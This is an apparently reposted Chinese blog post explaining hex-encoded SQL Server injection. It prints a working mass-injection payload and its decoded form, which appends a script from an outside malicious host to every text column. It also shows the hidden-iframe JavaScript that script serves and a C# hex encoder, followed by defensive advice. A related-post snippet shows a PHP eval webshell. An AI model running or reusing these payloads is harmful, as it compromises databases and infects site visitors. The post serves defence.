警惕采用编码过的SQL恶意注入

最新推荐文章于 2024-11-08 10:47:20 发布
最新推荐文章于 2024-11-08 10:47:20 发布
阅读量148 收藏
点赞数
文章标签: 数据库 javascript ViewUI
原文链接:http://www.cnblogs.com/micheng11/archive/2009/07/29/1533876.html
版权

   现在很多网站发现SQL注入攻击,
黑客把SQL语句转换成了16进制后就可以逃避我们平时很多的防注入检测了
声明了个 @s,使用了编码的方式把sql语句变成一大串“乱七八糟”(16进制)的东西,然后通过exec可以执行“动态”SQL的特性运行脚本。
还逃避了对关键字字符串的检查。

一般来说最终注入代码都类似于如下片段(SQL Server 2000/2005):

dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72 eXeC(@s);--

 到SQL后台执行时就是下面语句(可以在SQL查询窗口把上面语句最后的 exec(@s);改成 select @s试试看,结果就是下面语句):

 

Declare   @T   Varchar ( 255 ), @C   Varchar ( 255 Declare  Table_Cursor  Cursor   For   Select  A.Name,B.Name  From  Sysobjects A,Syscolumns B  Where  A.Id = B.Id  And  A.Xtype = ' u '   And  (B.Xtype = 99   Or  B.Xtype = 35   Or  B.Xtype = 231   Or  B.Xtype = 167 Open  Table_Cursor  Fetch   Next   From   Table_Cursor  Into   @T , @C   While ( @@Fetch_Status = 0 Begin   Exec ( ' update [ ' + @T + ' ] Set [ ' + @C + ' ]=Rtrim(Convert(Varchar(8000),[ ' + @C + ' ]))+ '' <script src=http://8f8el3l.cn/0.js></script> ''' ) Fetch   Next   From   Table_Cursor  Into   @T , @C   End   Close  Table_Cursor  Deallocate  Table_Cursor

可以看出这种SQL注入就是利用表名sysobjects,syscolumns这两个系统表来进行遍历的。

运行后库中的每个表的每条记录都会加上<script src=http://8f8el3l.cn/0.js></script>这段脚本,
脚本内容是这样的
document.writeln(" <base οnmοuseοver=\"window.status=\'完毕                                                  \';return true\">");
document.writeln(" <SCRIPT LANGUAGE=\"JavaScript\"> ");
document.writeln(" <!-- Hide ");
document.writeln("function killErrors() { ");
document.writeln("return true; ");
document.writeln("} ");
document.writeln("window.onerror = killErrors; ");
document.writeln("\/\/ --> ");
document.writeln(" <\/SCRIPT>");
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 800)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1a01ab2="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1a01ab2=hhhh;expires="+ Then.toGMTString()
document.writeln("<iframe src=http://5u66j.cn/aa/a3a.htm width=0 height=0></iframe>");
document.writeln("<iframe src=http://5u66j.cn/aa/a3a.htm width=0 height=0></iframe>");
}
}Get();


黑客代码SQL注入部分转换生成方法: 

         ///   <summary>
         /// 字符串转换为16进制
         /// using System.Text;
         /// using Microsoft.VisualBasic;
         ///   </summary>
         ///   <param name="Data"></param>
         ///   <returns></returns>
         static   string  ToHexString( string  Data)
        {
            StringBuilder sb  =   new  StringBuilder( " 0x " );
             foreach  ( char  c  in  Data)
            {
                sb.Append(Conversion.Hex(( int )c)).Append( " 00 " );
            }
             return  sb.ToString();   
        }


查了下别人说的防范措施:

1.不要使用sa用户连接数据库

2、新建一个public权限数据库用户,并用这个用户访问数据库

 

3、去掉角色public对sysobjects与syscolumns对象的select访问权限

[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”

 

4、通过以下代码检测(失败表示权限正确):

 

DECLARE @T varchar(255),

@C varchar(255)

DECLARE Table_Cursor CURSOR FOR

Select a.name,b.name from sysobjects a,syscolumns b

where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor

FETCH NEXT FROM Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0)

BEGIN print @c

FETCH NEXT FROM Table_Cursor INTO @T,@C

END

CLOSE Table_Cursor

DEALLOCATE Table_Cursor
面的方式只是延缓了SQL盲注,因为大规模批量注入都是程序自动进行的,这种方法也就是屏蔽掉了程序对于此类SQL Server数据库的盲注攻击,但是SQL注入点还是依然存在的,如果是人工在得到相关信息的情况下进行注入,还是无法避免的,治本还是需要从源程序入手彻底修改掉,使用参数化SQL

 

在服务器的IIS中,找到这个被挂马的网站属性,主目录中―配置中---找到.asp及.aspx的影射,将里面的中的HEAD操作与TRACE操作删除,只保留GET与POST就可以解决,

 

注意删除HEAD操作与TRACE操作完全不会影响正常的网站访问.正常的网站并不需要这两个操作

 

转载于:https://www.cnblogs.com/micheng11/archive/2009/07/29/1533876.html

weixin_30300523
关注
SQL注入总结
KHOST的博客
11-29 791
SQL注入的攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。 可显注入 攻击者可以直接在当前界面内容中获取想要获得的内容。 报错注入 数据库查询返回结果并没有在页面中显示,但是应用程序将数据库报错信息打印到了页面中,所以攻击者可以构造数据库报错语句,从报错信息中获取想要获得的内容。 盲注 数据库查询结果无法从直观页面中获取,攻击者通过使用数据库逻辑或使数...
sql注入详解
m0_67392811的博客
06-12 6190
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入以及防注入代码
05-15
SQL注入以及防注入代码
关于SQL注入编码问题的疑问
weixin_30826095的博客
01-27 625
提到SQL注入的绕过,编码是其中最普通的一种方法,最常用的URL编码。之前一直有个疑问,编码与未编码到底有哪些地方存在区别? 以下是本人自己对URL编码的一些见解,可能有错误的地方欢迎大佬们指正。 什么是URL编码。 “URL编码是一种浏览器用来打包表单输入的格式,浏览器从表单中获取所有的name和其对应的value,将他们以name/value编码方式作为URL的一部分或者分离的发送到服务...
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
03-17 9082
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
SQL注入遇到诡异的编码问题
hackzkaq的博客
03-15 858
零基础学黑客,搜索公众号:白帽子左一 本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 前言 最近给甲方爸爸做渗透测试时发现了一个诡异的SQL注入,之所以说诡异,是因为该系统数据库连接编码与实际的数据库编码不一致,并且数据库表字段名使用了中文的字段名,导致通过正常手段无法获取到数据库数据。 故事开始 1、拿到资产清单后,发现有这样一个站。 2、简单测试了一下,发现该页面无验证码,无密码验证次数限制,可进行暴力破解,但进行了一波爆破后,
ASP.NET防止SQL注入的方法示例
01-20
在ASP.NET开发中,SQL注入是一种常见的安全威胁,它允许攻击者通过输入恶意SQL语句来操纵数据库。本文将详细讲解如何使用实例方法防止ASP.NET中的SQL注入。 首先,了解SQL注入的基本概念。SQL注入是当应用程序直接...
php防止SQL注入详解及防范
10-26
在当今的网络时代,安全性始终是软件开发过程中需要关注的核心问题之一。特别是Web应用,因其与互联网的直接连接,其安全性...只有在开发过程中,时刻警惕采用恰当的安全防护策略,才能有效地避免SQL注入等安全漏洞。
SQL手工注入完全篇
09-08
SQL注入是攻击者通过在输入字段中插入恶意SQL代码,使得原本的数据库查询语句发生变化,从而达到获取未经授权的数据、篡改数据或者破坏数据库系统的目的一种攻击方式。这种攻击通常发生在应用系统没有对用户输入...
超级SQL注入工具V1.0 正式版
07-14
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码,来获取、修改或删除数据库中的敏感信息,甚至控制整个服务器。《超级SQL注入工具V1.0 正式版》是一款专门用于检测SQL注入点的软件,旨在帮助...
sql写入恶意代码
weixin_48800344的博客
09-01 684
就是通过sql Inject漏洞写入恶意代码 一句话木马 php: <?php @eval($_POST['mxh']);?> asp: <%eval request(“mxh”)%> 里面’’ “” 又是一个新问题,hhh,不过经过研究了解了 select 1,2 into outfile “/var/www/html/1.php” **作用详解:**into outfile 将select 的结果写入到指定目录的文件中,然后访问获取权限,例如菜刀… 条件: 1.需要知道远程目
sql注入方式
m0_69801663的博客
05-28 149
sql注入方式
简单的SQL注入
最新发布
2301_76914258的博客
11-08 762
多多实战,纸上得来终觉浅。
SQL注入
m0_51600840的博客
07-25 2784
是注释的意思,那么是不是后面的都被注释掉了,所以该语句的意思是不是就变成了如果USER等于我输入的值或者1=1那么就登录成功,因为1=1恒成立,那么是不是不管我输入什么都能登录成功,甚至不需要输入密码。盲注入盲注不会展现任何数据库报错内容,它是依据构造真或假的问题对数据库进行“提问”,注入方式主要有两种基于布尔值与基于时间。网站被挂马,传播恶意软件修改数据库一些字段的值,嵌入网马链接,进行挂马攻击。换言之,我服务器明明想要执行的是你用户提交的一个数据,可是你提交了一个数据。...
SQL注入,很详细
m0_63683040的博客
04-20 1588
SQL注入(数字、UNION、字符型、布尔盲注、时间、报错、堆叠) SQL注入漏洞的方法 1.数字注入 在浏览器地址栏输入:learn.me/sql/article.php?id=1,这是一个get型接口,发送这个请求相当于调用一个查询语句: PHP源码: $sql = "SELECT * FROM database_name WHERE id =",$_GET[‘id’] 在浏览器地址栏输入:learn.me/sql/article.php?id=2-...
gbk字符编码和宽字节sql注入
sworddancing is the best one
09-27 2614
ctf题目中宽字节注入是很常见的问题,我这篇文章的目的就是弄明白其中的原理。 通常来说,一个gbk编码的汉字通常占用两个字节,一个utf-8编码汉字,占用三个字节, 占用3个字节。在php中,我们可以通过输出 echo strlen("和"); 来测试。当将页面编码保存为gbk时输出2,utf-8时输出3。   说了这么多废话,现在来研究一下在SQL注入中,gbk字符编码带来的各种...
SQL注入--代码层注入
weixin_34062469的博客
06-24 3122
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令. 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。 这篇文章只是为了能够更清楚的了解SQL注入,并且提出一些解决方法,但是没有详细的过程...
ASP.NET SQL注入安全编码实践
在软件开发中,SQL注入是一种常见的安全漏洞,攻击者可以通过输入恶意SQL代码来操纵数据库,获取、修改或删除敏感数据。在.NET框架中,开发人员需要特别注意对用户输入的数据进行验证和清理,以防止SQL注入的发生...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值